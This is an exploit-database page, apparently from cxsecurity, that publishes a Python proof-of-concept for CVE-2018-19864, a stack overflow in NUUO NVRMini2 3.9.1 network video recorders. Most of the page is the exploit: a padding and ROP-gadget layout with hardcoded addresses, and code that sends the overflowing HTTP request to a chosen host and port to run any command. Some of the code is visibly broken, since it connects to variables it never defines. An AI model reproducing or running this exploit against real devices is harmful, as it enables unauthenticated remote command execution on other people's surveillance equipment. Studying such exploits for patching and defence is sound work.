NUUO NVRMini 2 3.9.1 Stack Overflow

2019.06.05
Credit: 0x00string
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python # Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow # Google Dork: n/a # Date: Advisory Published: Nov 18 # Exploit Author: @0x00string # Vendor Homepage: nuuo.com # Software Link: https://www.nuuo.com/ProductNode.php?node=2 # Version: 3.9.1 and prior # Tested on: 3.9.1 # CVE : CVE-2018-19864 # # [ leading / ] # [ Padding x 335 ] # [ original value at stack pointer + 158 ] # [ padding x 80 ] # [ address of (pop {r3,lr} ; bx lr) ] # [ system() address ] # [ address of (mov r0,sp ; blx r3) ] # [ command to execute ] def banner(): print ''' @0x00string 0000000000000 0000000000000000000 00 00000000000000000000000000000 0000000000000000000000000000000 000000000 0000000000 00000000 0000000000 0000000 000000000000 0000000 000000000000000 000000 000000000 000000 0000000 000000000 000000 000000 000000000 000000 000000 000000000 000000 000000 00000000 000000 000000 000000000 000000 0000000 000000000 0000000 000000 000000000 000000 0000000000000000 0000000 0000000000000 0000000 00000000000 00000000 00000000000 000000000 0000000000000000000000000000000 00000000000000000000000000000 000 0000000000000000000 0000000000000 https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py ''' def usage (): print ("python script.py <args>\n" " -h, --help: Show this message\n" " -a, --rhost: Target IP address\n" " -b, --rport: Target Port - default 5150\n" " -c, --command: Command to execute\n" "\n" "Example:\n" "python script.py -a 10.10.10.10\n" "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") exit() def main(): rhost = None; rport = "5150"; command = "{/bin/touch,/tmp/hax}" banner() options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() elif opt in ('-a','--rhost'): rhost = arg; elif opt in ('-b','--rport'): rport = arg; elif opt in ('-c','--command'): command = arg; print ("Sending exploit to execute [" + command + "]\n") buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + "http://" + rhost + ":" + rport + "\r\n\r\n" sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(30) sock.connect((target_ip,int(target_port))) sock.send(buf) print ("done\n") if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top